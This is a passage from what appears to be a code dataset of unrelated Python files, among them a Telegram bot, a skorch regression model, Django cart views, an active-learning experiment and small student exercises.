'phone': \"Telephone :\",\n 'mails': \"Adresse mails :\",\n 'poste': \"Poste :\",\n }\n def save(self, commit=True):\n stagiaire = super(StagiaireForm, self).save(commit=False)\n if commit:\n stagiaire.save()\n return stagiaire\n","sub_path":"abc_front/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"149013938","text":"# encoding: UTF-8\n# Genaro Ortiz Durán, A01375315\n# Descripción: Diseño topd-down para encontrar el rendimiento de un auto.\n\n#Calcula el rendimiento en km/l dividiendo los kilometros entre la gasolina.\ndef rendimiento(kilometros,gasolina):\n r=(kilometros/gasolina)\n return r\n#Para convertir los km/l a mi/ga se divide los (km entre km1)=M y la (gasolina se multiplica por g)=G.Por último se divide M entre G.\ndef conversion(kilometros,gasolina):\n km1=1.609344\n g=\t0.264172051\n M=kilometros/km1\n G=gasolina*g\n c=(M/G)\n return c\n#La función divide los kilometros entre la gasolina, el resultado se utiliza como divisor de la distancia.\ndef litros(kilometros,gasolina,distancia):\n a=(kilometros/gasolina)\n d=(distancia/a)\n return d\n\n\n\n\n\ndef main():\n kilometros=int(input(\"Teclea el número de kilometros recorridos:\"))\n gasolina=int(input(\"Teclea el número de litros de gasolina usados:\"))\n print(\"Si recorres\",kilometros,\"con\",gasolina,\"litros de gasolina\",\"el rendimiento es:\",format(rendimiento(kilometros,gasolina),\".2f\"),\"km/l\",format(conversion(kilometros,gasolina),\".2f\"),\"mi/gal\")\n distancia = int(input(\"¿Cuantos kilometros vas a recorrer:\"))\n print(\"Para recorrer\",distancia,\"km\",\"necesitas\",format(litros(kilometros,gasolina,distancia),\".2f\"),\"litros de gasolina\")\nmain()\n","sub_path":"Rendimiento.py","file_name":"Rendimiento.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"591360282","text":"import eb_thread, eb_message\n\nimport telepot, random\n\ndef read_private(filename):\n with open(\"private/\" + filename, \"r\") as f:\n return f.read().replace('\\n', '')\n\nTOKEN = read_private(\"telegram_token\")\n\nbot_name = \"Enfors_bot\"\n\nclass TelegramThread(eb_thread.Thread):\n def __init__(self, name, config):\n super().__init__(name, config)\n\n self.state = None # Temp. Remove later.\n\n \n def run(self):\n super().run()\n with self.config.lock:\n self.bot = telepot.Bot(TOKEN)\n\n self.bot.message_loop(self.handle_message)\n \n message = eb_message.Message(\"Telegram\", eb_message.MSG_TYPE_THREAD_STARTED)\n self.config.send_message(\"Main\", message)\n\n while True:\n try:\n message = self.config.recv_message(\"Telegram\")\n\n if (message.msg_type == eb_message.MSG_TYPE_STOP_THREAD):\n self.stop()\n return\n \n if message.msg_type == eb_message.MSG_TYPE_USER_MESSAGE:\n self.bot.sendMessage(message.data[\"user\"],\n message.data[\"text\"])\n except error:\n print(\"ERROR: %s\" % error)\n self.config.set_thread_state(\"Telegram\", \"exception\")\n time.sleep(60)\n\n \n\n\n def handle_message(self, msg):\n content_type, chat_type, chat_id = telepot.glance(msg)\n\n if content_type == \"text\":\n text = msg[\"text\"].strip()\n user = msg[\"chat\"][\"id\"]\n\n if text[0] == \"/\":\n text = text[1:]\n\n if text.lower().startswith(\"@enfors_bot \"):\n text = text[12:]\n \n print(\"Telegram: Incoming message from %s(%d): '%s'\" %\n (msg[\"from\"][\"first_name\"], user, text))\n\n # If this is a kind of message only Telegram can handle\n # (inline keyboards, etc), then don't send it to the\n # main thread.\n if self.handle_telegram_message(text.lower(), user):\n return\n\n # Send the message to the main thread.\n message = eb_message.Message(\"Telegram\",\n eb_message.MSG_TYPE_USER_MESSAGE,\n { \"user\": msg[\"chat\"][\"id\"],\n \"text\": text })\n self.config.send_message(\"Main\", message)\n else:\n print(\"Incoming %s message, ignoring.\", content_type)\n\n\n\n def handle_telegram_message(self, text, user):\n if text == \"rps\": # Rock paper scissors\n self.state = \"rps\"\n\n show_keyboard = { \"keyboard\" : [[\n \"rock\", \"paper\", \"scissors\"\n ]]}\n \n self.bot.sendMessage(user, \"You want to play \"\n \"rock, paper, scissors?\\n\"\n \"Okay, make your choice:\",\n reply_markup = show_keyboard)\n\n return True\n\n if self.state == \"rps\" and text in [ \"rock\", \"paper\", \"scissors\" ]:\n self.finish_playing_rps(text, user)\n return True\n\n \n return False\n\n\n\n def finish_playing_rps(self, user_choice, user):\n my_choice = [ \"rock\", \"paper\", \"scissors\" ][random.randint(0, 2)]\n\n hide_keyboard = { \"hide_keyboard\" : True }\n self.bot.sendMessage(user, \"I choose %s\" % my_choice,\n reply_markup = hide_keyboard)\n\n if ((my_choice == \"rock\" and user_choice == \"paper\") or\n (my_choice == \"paper\" and user_choice == \"scissors\") or\n (my_choice == \"scissors\" and user_choice == \"rock\")):\n self.bot.sendMessage(user, \"You win!\")\n else:\n self.bot.sendMessage(user, \"I win!\")\n \n self.state = None\n \n","sub_path":"eb_telegram.py","file_name":"eb_telegram.py","file_ext":"py","file_size_in_byte":3912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"176603694","text":"import os\nimport requests\nimport json\nimport numpy\n\nADS_KEY = os.environ[\"ADS_API_KEY\"]\nBASE_URL = \"https://api.adsabs.harvard.edu/v1/search/query\"\n\n\ndef query_acknowledgments(word):\n # Set query parameters\n params = {\n 'q': 'ack:{0:s},property:REFEREED'.format(word),\n 'fl': 'pubdate',\n 'rows': '200',\n 'start': 0,\n }\n pub_years = []\n while True:\n # Execute the query\n headers = {'Authorization': 'Bearer:' + ADS_KEY}\n r = requests.get(BASE_URL, params=params, headers=headers)\n\n # Check if anything went wrong\n if r.status_code != requests.codes.ok:\n e = json.loads(r.text)\n perror = \"Error retrieving results: {0:s}\\n\".format(e['error'])\n sys.stderr.write(perror)\n continue\n\n # Extract results\n data = json.loads(r.text)\n for d in data['response']['docs']:\n pub_years.append(float(d['pubdate'].split('-')[0]))\n\n # Update starting point\n params['start'] += 200\n\n # Check if finished\n if params['start'] >= data[\"response\"][\"numFound\"]:\n break\n return numpy.array(pub_years)\n\n\ndef total_number(year):\n params = {\n 'q': 'pubdate:{0:s},property:REFEREED'.format(year),\n 'rows': 1\n }\n headers = {'Authorization': 'Bearer:' + ADS_KEY}\n r = requests.get(BASE_URL, params=params, headers=headers)\n data = json.loads(r.text)\n return data[\"response\"][\"numFound\"]\n\n\nYEARS = list(range(1995, 2017))\nTOTAL_COUNT = []\nfor year in YEARS:\n date = '{0:04d}'.format(year)\n TOTAL_COUNT.append(total_number(date))\nTOTAL_COUNT = numpy.array(TOTAL_COUNT)\n\n\ndef plot_yearly_trend(keyword, label=None):\n pub_years = query_acknowledgments(keyword)\n query_count = numpy.array([numpy.sum(pub_years == year) for year in YEARS])\n","sub_path":"ads-api.py","file_name":"ads-api.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22913625","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom hyperopt import hp\nfrom hyperopt.pyll import scope\nfrom sklearn.datasets import make_classification\nfrom skorch import NeuralNetRegressor\nfrom skorch.callbacks import EarlyStopping, LRScheduler, EpochScoring\nfrom skorch.dataset import CVSplit\nfrom torch import nn\nfrom torch.optim import lr_scheduler\n\nfrom config import RANDOM_STATE\nfrom utils import NonTreeBasedModel\n\n\nclass AdvancedNeuralNetworkModel(NonTreeBasedModel):\n @classmethod\n def prepare_dataset(cls, train_data, test_data, categorical_features):\n (X_train, y_train, *other), (X_test, y_test) = \\\n super(AdvancedNeuralNetworkModel, cls).prepare_dataset(train_data, test_data,\n categorical_features)\n return ((X_train.astype(np.float32), y_train.astype(np.float32).reshape((-1, 1)), *other),\n (X_test.astype(np.float32), y_test.astype(np.float32).reshape((-1, 1))))\n\n @staticmethod\n def build_estimator(hyperparams, train_data, test=False):\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n\n # Extract info from training data\n X, y, *_ = train_data\n in_features = X.shape[1]\n\n callbacks = [\n ('r2_score_valid', EpochScoring('r2',\n lower_is_better=False)),\n ('early_stopping', EarlyStopping(monitor='valid_loss',\n patience=5,\n lower_is_better=True)),\n ('learning_rate_scheduler', LRScheduler(policy=lr_scheduler.ReduceLROnPlateau,\n monitor='valid_loss',\n # Following kargs are passed to the\n # lr scheduler constructor\n mode='min',\n min_lr=1e-5\n )),\n ]\n\n return NeuralNetRegressor(\n NNModule,\n criterion=nn.MSELoss,\n optimizer=torch.optim.SGD,\n max_epochs=300,\n iterator_train__shuffle=True, # Shuffle training data on each epoch\n callbacks=callbacks,\n device=device,\n train_split=CVSplit(cv=5, random_state=RANDOM_STATE),\n lr=hyperparams['lr'],\n batch_size=hyperparams['batch_size'],\n module__in_features=in_features,\n module__n_layers=hyperparams['n_layers'],\n module__n_neuron_per_layer=hyperparams['n_neuron_per_layer'],\n module__activation=getattr(F, hyperparams['activation']),\n module__p_dropout=hyperparams['p_dropout'],\n optimizer__momentum=hyperparams['momentum'],\n optimizer__weight_decay=hyperparams['weight_decay'],\n optimizer__nesterov=True,\n verbose=3,\n iterator_train__num_workers=4,\n iterator_valid__num_workers=4\n )\n\n hp_space = {\n 'lr': hp.loguniform('learning_rate', np.log(1e-4), np.log(1e-1)),\n 'batch_size': 128,\n 'n_neuron_per_layer': scope.int(hp.quniform('layer_size', 10, 100, 3)),\n 'activation': hp.choice('activation', ['relu', 'leaky_relu', 'selu']),\n 'p_dropout': hp.uniform('p_dropout', 0.0, 0.5),\n 'momentum': hp.uniform('momentum', 0.87, 0.99),\n 'weight_decay': hp.loguniform('alpha', np.log(1e-7), np.log(1e-2)),\n 'n_layers': hp.choice('n_layers', [2, 3, 4, 5])\n }\n\nclass NNModule(nn.Module):\n def __init__(self,\n in_features,\n n_layers,\n n_neuron_per_layer=10,\n activation=F.relu,\n p_dropout=0.5):\n super(NNModule, self).__init__()\n\n self.first_layer = Layer(in_features, n_neuron_per_layer, activation, p_dropout)\n self.middle_layers = ListModule(self, 'middle_layer')\n for _ in range(n_layers-2):\n self.middle_layers.append(\n Layer(n_neuron_per_layer, n_neuron_per_layer, activation, p_dropout))\n self.fc = nn.Linear(n_neuron_per_layer, 1)\n\n def forward(self, X, **kwargs):\n X = self.first_layer(X)\n for layer in self.middle_layers:\n X = layer(X)\n X = self.fc(X)\n return X\n\nclass Layer(nn.Module):\n def __init__(self, in_features, out_feature, activation, p_dropout):\n super(Layer, self).__init__()\n self.dense = nn.Linear(in_features, out_feature)\n self.dropout = nn.Dropout(p_dropout)\n self.activation = activation\n self.batchnorm = nn.BatchNorm1d(out_feature)\n\n def forward(self, X):\n X = self.dense(X)\n X = self.activation(X)\n X = self.dropout(X)\n return X\n\nclass ListModule(object):\n def __init__(self, module, prefix, *args):\n self.module = module\n self.prefix = prefix\n self.num_module = 0\n for new_module in args:\n self.append(new_module)\n\n def append(self, new_module):\n if not isinstance(new_module, nn.Module):\n raise ValueError('Not a Module')\n else:\n self.module.add_module(self.prefix + str(self.num_module), new_module)\n self.num_module += 1\n\n def __len__(self):\n return self.num_module\n\n def __getitem__(self, i):\n if i < 0 or i >= self.num_module:\n raise IndexError('Out of bound')\n return getattr(self.module, self.prefix + str(i))\n","sub_path":"regression/models/advanced_neural_network.py","file_name":"advanced_neural_network.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"386783356","text":"\nimport pyblish.api\nfrom reveries.maya.plugins import MayaSelectInvalidInstanceAction\n\n\nclass SelectInvalid(MayaSelectInvalidInstanceAction):\n\n label = \"Select Invalid Instance\"\n\n\nclass ValidateDeadlineMayaScheduling(pyblish.api.InstancePlugin):\n\n label = \"Deadline Scheduling\"\n order = pyblish.api.ValidatorOrder + 0.1\n hosts = [\"maya\"]\n\n targets = [\"deadline\"]\n\n families = [\n \"reveries.pointcache\",\n \"reveries.standin\",\n \"reveries.renderlayer\",\n ]\n actions = [\n pyblish.api.Category(\"Select\"),\n SelectInvalid,\n ]\n\n @classmethod\n def get_invalid(cls, instance):\n cls.log.debug(\"Selecting %s\" % instance.data[\"objectName\"])\n return [instance.data[\"objectName\"]]\n\n def process(self, instance):\n\n priority_limit = 80\n priority = instance.data[\"deadlinePriority\"]\n assert priority <= priority_limit, (\"Deadline priority should not be \"\n \"greater than %d.\"\n \"\" % priority_limit)\n\n pool = instance.data[\"deadlinePool\"]\n assert not pool == \"none\", (\"Deadline pool did not set.\")\n","sub_path":"plugins/maya/publish/validate_deadline_maya_scheduling.py","file_name":"validate_deadline_maya_scheduling.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264305527","text":"#!/usr/bin/env python3\n\"\"\"\nThis script simulates real world use of active learning algorithms. Which in the\nstart, there are only a small fraction of samples are labeled. During active\nlearing process active learning algorithm (QueryStrategy) will choose a sample\nfrom unlabeled samples to ask the oracle to give this sample a label (Labeler).\n\nIn this example, ther dataset are from the digits dataset from sklearn. User\nwould have to label each sample choosed by QueryStrategy by hand. Human would\nlabel each selected sample through InteractiveLabeler. Then we will compare the\nperformance of using UncertaintySampling and RandomSampling under\nLogisticRegression.\n\"\"\"\n\nimport copy\nimport argparse\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, confusion_matrix, recall_score\n\n\n# project dependencies\nsys.path.insert(0, 'python') # path to the module.\n\n# keras\n# from keras.preprocessing.text import Tokenizer\n# from keras.preprocessing.sequence import pad_sequences\n# from keras.utils import to_categorical\n\n# libact classes\nfrom libact.base.dataset import Dataset\nfrom libact.models import LogisticRegression\nfrom libact.query_strategies import UncertaintySampling, RandomSampling\nfrom libact.labelers import InteractiveLabeler, IdealLabeler\n\n# demo utils\nfrom utils import *\nfrom libact_utils.labeler import InteractivePaperLabeler\n\n\n# parse arguments if available\nparser = argparse.ArgumentParser(description='Active learning parameters')\n\n# the number of iterations\nparser.add_argument(\n \"--quota\", type=int, default=10, help=\"The number of queries\")\n\n# interactive or not\nparser.add_argument('--interactive', dest='interactive', action='store_true',\n help=\"Interactive or not?\")\nparser.add_argument('--no-interactive', dest='interactive',\n action='store_false')\nparser.set_defaults(interactive=False)\n\n# type of model\nparser.add_argument('--model', type=str,\n default='MultinomialNB',\n help=\"The sklearn model to use for classification.\")\n\n\ndef get_indices_labeled_entries(dataset):\n \"\"\"Get labeled indices\"\"\"\n\n return [idx for idx, entry in enumerate(dataset.data) if entry[1] is not None]\n\n\n# def tranform_text_data(texts):\n# \n# # tokenizer\n# tokenizer = Tokenizer()\n# tokenizer.fit_on_texts(texts)\n# \n# sequences = tokenizer.texts_to_sequences(texts)\n# data = pad_sequences(sequences,\n# maxlen=maxlen,\n# padding='post', truncating='post')\n# \n# return data, tokenizer.word_index\n# \n\ndef make_pool(X, y, prelabeled=np.arange(5)):\n \"\"\"Function to split dataset into train and test dataset.\n\n Arguments\n ---------\n\n prelabeled: list\n List of indices for which the label is already available.\n\n \"\"\"\n\n # a set of labels is already labeled by the oracle\n y_train_labeled = np.array([None] * len(y))\n y_train_labeled[prelabeled] = y[prelabeled]\n\n # we are making a pool of the train data\n # the 'prelabeled' labels of the dataset are already labeled.\n return Dataset(X, y_train_labeled), Dataset(X, y)\n\n\ndef main(args):\n\n acc_pool = []\n maxlen = 100\n\n # get the texts and their corresponding labels\n texts, labels = load_ptsd_data()\n\n # Keras example\n # # transform data into matrix of integers\n # tokenizer = Tokenizer()\n # tokenizer.fit_on_texts(texts)\n # sequences = tokenizer.texts_to_sequences(texts)\n # data = pad_sequences(sequences,\n # maxlen=maxlen,\n # padding='post', truncating='post')\n\n from sklearn.feature_extraction.text import CountVectorizer\n from sklearn.feature_extraction.text import TfidfTransformer\n from libact.models import SklearnProbaAdapter, SklearnAdapter\n\n from sklearn.naive_bayes import MultinomialNB\n from sklearn.svm import SVC\n from sklearn.linear_model import LogisticRegression\n\n # count words\n count_vect = CountVectorizer(max_features=5000, stop_words='english')\n features = count_vect.fit_transform(texts).todense().tolist()\n \n \n # import pdb; pdb.set_trace()\n if 0:\n # tf-idf\n tfidf_transformer = TfidfTransformer()\n features = tfidf_transformer.fit_transform(features)\n \n\n pool, pool_ideal = make_pool(\n features, labels,\n prelabeled=[1, 2, 3, 4, 5, 218, 260, 466, 532, 564]\n )\n\n # get the model\n if args.model.lower() in ['multinomialnb', 'nb']:\n sklearn_model = MultinomialNB\n kwargs_model = {}\n elif args.model.lower() == 'svc':\n sklearn_model = SVC\n kwargs_model = {\n 'probability': True,\n # 'class_weight': {0: 1, 1: 100}\n 'class_weight': 'balanced' \n }\n elif args.model.lower() == 'logisticregression':\n sklearn_model = LogisticRegression\n kwargs_model = {}\n else:\n raise ValueError('Model not found.')\n\n # initialize the model through the adapter\n model = SklearnProbaAdapter(sklearn_model(**kwargs_model))\n\n # query strategy\n # https://libact.readthedocs.io/en/latest/libact.query_strategies.html\n # #libact-query-strategies-uncertainty-sampling-module\n #\n # least confidence (lc), it queries the instance whose posterior\n # probability of being positive is nearest 0.5 (for binary\n # classification); smallest margin (sm), it queries the instance whose\n # posterior probability gap between the most and the second probable\n # labels is minimal\n qs = UncertaintySampling(\n pool, method='lc', model=SklearnProbaAdapter(sklearn_model(**kwargs_model)))\n\n # The passive learning model. The model given in the query strategy is not\n # the same. Have a look at this one.\n # model = LogisticRegression()\n\n fig, ax = plt.subplots()\n ax.set_xlabel('Number of Queries')\n ax.set_ylabel('Value')\n\n # Train the model on the train dataset.\n model.train(pool)\n\n # the accuracy of the entire pool\n acc_pool = np.append(\n acc_pool,\n model._model.score([x[0] for x in pool.get_entries()], labels)\n )\n\n # make plot\n query_num = np.arange(0, 1)\n p2, = ax.plot(query_num, acc_pool, 'r', label='Accuracy')\n plt.legend(loc='upper center', bbox_to_anchor=(0.5, -0.05), fancybox=True,\n shadow=True, ncol=5)\n plt.show(block=False)\n\n # Give each label its name (labels are from 0 to n_classes-1)\n if args.interactive:\n lbr = InteractivePaperLabeler(label_name=[\"0\", \"1\"])\n else:\n lbr = IdealLabeler(dataset=pool_ideal)\n\n query_i = 1\n\n while query_i <= args.quota:\n\n # make a query from the pool\n print(\"Asking sample from pool with Uncertainty Sampling\")\n ask_id = qs.make_query()\n print(\"Index {} returned. True label is {}.\".format(\n ask_id, pool_ideal.data[ask_id][1]))\n\n # get the paper\n data_point = pool.data[ask_id][0]\n lb = lbr.label(data_point)\n\n # update the label in the train dataset\n pool.update(ask_id, lb)\n\n # train the model again\n model.train(pool)\n\n # append the score to the model\n acc_pool = np.append(\n acc_pool,\n model._model.score([x[0] for x in pool.get_entries()], labels)\n )\n\n # additional evaluations\n #pred = model.predict([x[0] for x in pool.get_entries()])\n\t\t\n idx_features = pool.get_unlabeled_entries()\n features = [x[1] for x in idx_features]\n idx= [x[0] for x in idx_features]\n pred = model.predict(features)\n\n print(confusion_matrix(labels[idx], pred))\n print(recall_score(labels[idx], pred))\n\n if args.interactive:\n # update plot\n ax.set_xlim((0, query_i))\n ax.set_ylim((0, max(acc_pool) + 0.2))\n p2.set_xdata(np.arange(0, query_i + 1))\n p2.set_ydata(acc_pool)\n plt.draw()\n\n # update the query counter\n query_i += 1\n\n if not args.interactive:\n # update plot\n ax.set_xlim((0, query_i - 1))\n ax.set_ylim((0, max(acc_pool) + 0.2))\n p2.set_xdata(np.arange(0, query_i))\n p2.set_ydata(acc_pool)\n plt.draw()\n\n print(acc_pool)\n\n input(\"Press any key to continue...\")\n\n\nif __name__ == '__main__':\n\n # parse all the arguments\n args = parser.parse_args()\n\n try:\n # start the active learning algorithm\n main(args)\n except KeyboardInterrupt:\n print('Closing down.')\n","sub_path":"deprecated/ptsd_active_classical.py","file_name":"ptsd_active_classical.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"366480099","text":"from uiautomator import device as d\nimport unittest\nimport time\n\nclass CancelAddingContact(unittest.TestCase):\n def setUp(self):\n super(CancelAddingContact,self).setUp()\n\n def testCancelAddContact(self):\n #Launch Contacts\n d(text = 'People').click.wait()\n assert d(description = 'Favorites').wait.exists(timeout = 2000), 'Contacts launch failed'\n\n #Tap on add contact icon\n d(description = 'Add Contact').click.wait()\n assert d(description = 'contact photo').wait.exists(timeout = 2000), 'Add contact page does not pop up'\n\n #Cancel adding contact\n d(description = 'More options').click.wait()\n assert d(text = 'Join').wait.exists(timeout = 2000), 'Menu does not pop up'\n\n d(text = 'Discard').click.wait()\n assert d(description = 'Favorites').wait.exists(timeout = 2000), 'Contacts launch failed'\n\n #Exit activity\n d.press.back()\n d.press.back()\n\n assert d(text = 'People').wait.exists(timeout = 2000), 'Contacts does not exit in 2s'\n\n def tearDown(self):\n super(CancelAddingContact,self).tearDown()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"UA_test.py","file_name":"UA_test.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204518325","text":"from django.shortcuts import render, redirect, HttpResponse, get_object_or_404\nfrom django.contrib import messages\n\nfrom products.models import Product\n\n# Create your views here.\n\n\ndef view_bag(request):\n \"\"\" A view to return the bag content page \"\"\"\n\n return render(request, 'bag/bag.html')\n\n\ndef add_to_bag(request, item_id):\n \"\"\" Add a quantity of the specified product to the shopping bag \"\"\"\n\n product = get_object_or_404(Product, pk=item_id)\n quantity = int(request.POST.get('quantity'))\n redirect_url = request.POST.get('redirect_url')\n bag = request.session.get('bag', {})\n\n if item_id in list(bag.keys()):\n bag[item_id] += quantity\n messages.success(\n request, f'Updated {product.name} quantity to {bag[item_id]}')\n else:\n bag[item_id] = quantity\n messages.success(request, f'{product.name} added to basket')\n\n request.session['bag'] = bag\n return redirect(redirect_url)\n\n\ndef remove_from_bag(request, item_id):\n \"\"\"Remove the item from the shopping bag\"\"\"\n\n try:\n product = get_object_or_404(Product, pk=item_id)\n bag = request.session.get('bag', {})\n\n if bag[item_id]:\n del bag[item_id]\n messages.success(request, f'{product.name} removed from basket')\n else:\n bag.pop(item_id)\n messages.success(request, f'{product.name} removed from basket')\n\n request.session['bag'] = bag\n return HttpResponse(status=200)\n\n except Exception as e:\n messages.error(request, f'Oops! Removing item failed: {e}')\n return HttpResponse(status=500)\n","sub_path":"bag/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"213074831","text":"#calcular la media de 4 notas\r\nprint (\"Bienvenido!!!\")\r\nnota_1= int(input(\"Porfavor Ingrese la Nota 1: \"))\r\nnota_2= int(input(\"Ahora la Nota 2: \"))\r\nnota_3= int(input(\"La Nota 3: \"))\r\nnota_4= int(input(\"Y por ultimo Ingrese la Nota 4: \"))\r\npromedio= nota_1+nota_2+nota_3+nota_4\r\nif promedio/4 <= 10:\r\n\tprint (\"Usted esta reprobado\")\r\nelse:\r\n\tprint (\"Usted Aprobo el Curso!!!\")\r\n\r\nprint (\"El promedio de sus notas es: \",promedio/4)","sub_path":"notas.py","file_name":"notas.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"613204871","text":"while True:\n\ttry:\n\t\tlst = list(map(int,raw_input().strip().split(',')))\n\t\tleft_num = 0\n\t\tflag = True\n\t\tfor l in lst:\n\t\t\tfor b in range(7,-1,-1):\n\t\t\t\tif l>>b&1 == 0:\n\t\t\t\t\tbreak\n\t\t\tif b == 7:\n\t\t\t\tif left_num == 0:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\t\t\telif b < 6:\n\t\t\t\tif left_num == 0:\n\t\t\t\t\tleft_num = 6 - b\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\t\t\telif b == 6:\n\t\t\t\tif left_num > 0:\n\t\t\t\t\tleft_num -= 1\n\t\t\t\telse:\n\t\t\t\t\tflag = False\n\t\t\t\t\tbreak\n\n\t\tif left_num > 0:\n\t\t\tflag = False\n\t\tif flag:\n\t\t\tprint('true')\n\t\telse:\n\t\t\tprint('false')\n\texcept:\n\t\tbreak\n","sub_path":"niuke/118.py","file_name":"118.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"281517294","text":"#23min\r\nclass Solution:\r\n def numSmallerByFrequency(self, queries: List[str], words: List[str]) -> List[int]:\r\n # copy\r\n # 就是先统计words中字符串最小字母出现频次,然后将它排序得到w数组。这样我们在统计queries中字符串最小字母出现频次i的时候,这样我们就可以通过upper_bound计算出在w中比i大的第一个位置。\r\n # w = sorted([i.count(min(i)) for i in words])\r\n # return [len(w) - bisect.bisect_right(w, i.count(min(i))) for i in queries]#返回bisect_right将会插入的位置\r\n # copy2\r\n q = [i.count(min(i)) for i in queries]\r\n w = [i.count(min(i)) for i in words]\r\n res = []\r\n\r\n for i in range(len(queries)):\r\n k = 0\r\n for j in range(len(words)):\r\n if q[i] < w[j]:\r\n k += 1\r\n res.append(k)\r\n return res\r\n\r\n# # 3<4 2<3或者4(2个)#超时\r\n# def f(word):\r\n# a=sorted(word)\r\n# count=1\r\n# i=0\r\n# if len(word)==1:return 1 #忽略了\r\n# while if(q):\r\n# answer.append(len(b[i:]))\r\n# break\r\n\r\n# return answer","sub_path":"leetcode_solution/leetcode类别/10字符串/简单/1170. 比较字符串最小字母出现频次.py","file_name":"1170. 比较字符串最小字母出现频次.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12093963","text":"# -*- coding: utf-8 -*-\nfrom OurModelVerify import ChunkVerify\nfrom OurModelVerify import ErrorVerify\nfrom OurModelVerify import EveryChunkUnion\n\nclass Verify():\n def __init__(self, name):\n self.name = name\n\n def all_verify(self):\n # 19折交叉检验\n for chunk_number in range(1, 20):\n thread = ChunkVerify.VerifyClass(str(chunk_number) + \"号交叉检验法\",\n chunk_number, \"./VerifyOutPut/\")\n thread.start()\n thread.join()\n # 归并交叉检验结果\n chunk_union = EveryChunkUnion.EveryChunkUnionClass(\"./VerifyOutPut/\", \"./VerifyUnion/\")\n chunk_union.union()\n # 计算误差\n error_verify = ErrorVerify.ErrorVerifyClass(\"./VerifyUnion/ranks_result.csv\", \"./VerifyError/\")\n error_verify.error_verify()\n\nif __name__ == '__main__':\n verify = Verify(\"合并检验\")\n verify.all_verify()","sub_path":"OurModelVerify/Verify.py","file_name":"Verify.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"445975940","text":"import keras.backend as K\n\nMARGIN = 1.\n\n# Refer to https://github.com/maciejkula/triplet_recommendations_keras\n\ndef identity_loss(y_true, y_pred):\n return K.mean(y_pred - 0 * y_true)\n\ndef triplet_loss(vects):\n # f_anchor.shape = (batch_size, 256)\n f_anchor, f_positive, f_negative = vects\n # L2 normalize anchor, positive and negative, otherwise,\n # the loss will result in ''nan''!\n f_anchor = K.l2_normalize(f_anchors, axis = -1)\n f_positive = K.l2_normalize(f_positive, axis = -1)\n f_negative = K.l2_normalize(f_negative, axis = -1)\n\n dis_anchor_positive = K.sum(K.square(K.abs(f_anchor - f_positive)),\n axis = -1, keepdims = True)\n\n dis_anchor_negative = K.sum(K.square(K.abs(f_anchor - f_negative)),\n axis = -1, keepdims = True)\n loss = dis_anchor_positive + MARGIN - dis_anchor_negative \n return loss\n","sub_path":"DeepLearning/ComputerVision/VehicleReID/Code/loss.py","file_name":"loss.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596050754","text":"import random as rd\nimport numpy as np\n\n\"\"\"\nUse case\n myData = Data('../ml-1m/ratings.dat')\n myData.split(0.8)\n \n # while training\n X, Y, _, _ = myData.get_batch_train(512, 20)\n \n # after an epoch\n myData.shuffle_train()\n myData.renew_train()\n \n\"\"\"\n\n\nclass Data:\n\n def __init__(self, data_directory):\n self.userList = {}\n self.movieID2index = {}\n index = 0\n self.used_train = 0\n self.used_test = 0\n\n with open(data_directory, 'r') as f:\n for line in f.readlines():\n userID, movieID, rating, timeStamp = line.split('::')\n timeStamp = timeStamp.strip()\n if int(movieID) not in self.movieID2index:\n self.movieID2index[int(movieID)] = index\n index += 1\n if userID in self.userList:\n self.userList[userID].append((int(movieID), int(rating), int(timeStamp)))\n else:\n self.userList[userID] = [(int(movieID), int(rating), int(timeStamp))]\n self.movieDim = len(self.movieID2index)\n\n # sort rating triples for each user according to time stamp\n for key in self.userList:\n ratingsTriples = self.userList[key]\n ratingsTriplesSorted = sorted(ratingsTriples, key=lambda x: x[2])\n self.userList[key] = ratingsTriplesSorted\n self.user = len(self.userList)\n\n def split(self, ratio_train):\n all_users = list(self.userList.keys())\n self.train_users = all_users[0: int(ratio_train * self.user)]\n self.test_users = all_users[int(ratio_train * self.user):]\n\n def shuffle_train(self):\n rd.shuffle(self.train_users)\n\n def get_batch_train(self, batch_size, sequence_len):\n \"\"\"return X(batch * seq), Y(batch * movie), output_mask(batch * movie), flag\"\"\"\n if batch_size + self.used_train >= len(self.train_users):\n return None, None, None, False\n X, Y = 